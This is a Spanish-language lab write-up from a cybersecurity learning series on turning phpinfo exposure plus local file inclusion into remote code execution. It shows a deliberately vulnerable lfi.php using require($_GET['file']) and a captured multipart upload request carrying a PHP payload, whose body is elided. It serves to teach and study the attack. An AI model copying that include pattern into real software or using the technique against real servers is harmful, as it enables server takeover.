PhpInfo + LFI = RCE

Creando el entorno

Version Actual

PHP Version 7.4.11

Crear los archivos en el directorio /var/www/html

┌─[root@parrot]─[/var/www/html]
└──╼ #cat phpinfo.php 
<?php
	phpinfo();
?>
┌─[root@parrot]─[/var/www/html]
└──╼ #cat lfi.php 
<?php
	require($_GET['file']);
?>

Ejecutando el Exploit

Exploit Run

Get Shell

Analizando Exploit

En el codigo

Xploit

xploit2

Analizando con Wireshark

Packet HTTP

Packet HTTP Request

POST /phpinfo.php?a=A...A HTTP/1.1
HTTP_ACCEPT: A...A
HTTP_USER_AGENT: A...A
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714
Content-Length: 3661
Host: 127.0.0.1

-----------------------------7dbff1ded0714
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security Test
<?php
    ...code...;
?> 

-----------------------------7dbff1ded0714--

Packet HTTP Response

packeter_http_response

Execute Code Php

Request-Shell-Code

Referencias

https://www.hackplayers.com/2018/12/race-condition-phpinfo-mas-lfi-rce.html
https://github.com/M4LV0/LFI-phpinfo-RCE
https://hub.docker.com/r/dimonpvt/php5.5.9
https://developer.mozilla.org/es/docs/Web/HTTP/Headers/Content-Type
https://tools.ietf.org/html/rfc7231#section-3.1.1.4

CSLP by EduardoDesdes

Cyber Security Learning Path in Spanish ewe

PhpInfo + LFI = RCE

Creando el entorno

Ejecutando el Exploit

Analizando Exploit

En el codigo

Analizando con Wireshark

Packet HTTP Request

Packet HTTP Response

Execute Code Php

Referencias